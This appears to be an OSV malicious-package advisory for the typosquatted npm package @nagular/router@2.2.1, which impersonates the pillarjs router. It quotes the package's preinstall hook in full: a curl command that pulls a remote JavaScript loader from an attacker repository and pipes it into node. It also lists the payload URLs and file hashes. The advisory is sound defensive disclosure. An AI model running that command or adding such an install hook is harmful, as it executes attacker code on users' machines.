{"id":"MAL-2026-17500","summary":"Malicious code in @nagular/router (npm)","details":"@nagular/router@2.2.1 impersonates router (it copies the code and metadata of the pillarjs router package) and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account angularr published @nagular/router and 5 similar packages on 2026-10-03 between 06:33 and 07:23 UTC, all with the same preinstall script.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5db05365620b3f716b28b41577e593bc35a6699aee20090951158c206c2585ca)\npackage.json declares a preinstall lifecycle hook that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an opaque JavaScript payload from an unrelated third-party repository (gitflic.ru/hellscripter/install-scripts) proxied via web.archive.org and piping it directly into node at `npm install` time. The fetched bytes are not pinned by hash or version, the host is unrelated to the declared repository (pillarjs/router) or publisher domain (somethingdoug.com), and execution happens automatically with full user privileges on every install. Package metadata further impersonates the maintainer of the legitimate pillarjs/router package (author: Douglas Christopher Wilson) and uses the scope `@nagular/router`, a name likely to be confused with `@angular/router`, consistent with a typosquat lure designed to trick installers into running the preinstall dropper.\n","modified":"2026-10-05T23:00:06.351304871Z","published":"2026-10-03T07:23:44Z","database_specific":{"iocs":{"files":[{"note":"preinstall script pipes the web.archive.org copy of gitflic.ru hellscripter/install-scripts node.js into node (@nagular/router@2.2.1).","paths":["package.json"],"source":"PACKAGE_ARCHIVE","digests":{"sha256":"e2f4e8c00b7f3a8ff51e6f0f976f04aa5cdc35c3293878ce0435a6e324e92ab7"}}],"urls":["https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js","https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js"]},"malicious-packages-origins":[{"modified_time":"2026-10-04T23:19:54Z","sha256":"5db05365620b3f716b28b41577e593bc35a6699aee20090951158c206c2585ca","source":"amazon-inspector","versions":["2.2.1"],"id":"IN-MAL-2026-020920","import_time":"2026-10-04T23:40:42.030484033Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@nagular/router/v/2.2.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@nagular/router"}],"affected":[{"package":{"name":"@nagular/router","ecosystem":"npm","purl":"pkg:npm/%40nagular/router"},"versions":["2.2.1"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@nagular/router/MAL-2026-17500.json","indicators":{"evidence_files":[{"tlsh":"7821db31cc499c3312c96af53c295043b561480b8d04fe1db7ee036c4f4e26f657aa29","path":"package.json","sha256":"e2f4e8c00b7f3a8ff51e6f0f976f04aa5cdc35c3293878ce0435a6e324e92ab7"}],"package_integrity":[{"hashes":{"sha1":"49b4e36c1348d50ead23f4530d9f2d877dfada89","sha512_sri":"sha512-PFUDWzCy4gYmyhNgqxVjROfON+cfU/3DdWZ+AwYGxpjLGPYiqwdHt8B8jq37liQ5WjS1507gPVhyhdQ/zy80RA=="},"filename":"router-2.2.1.tgz"}]}}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"InvisiRisk, Inc.","contact":["https://www.invisirisk.com","mailto:research@invisirisk.com"],"type":"FINDER"}]}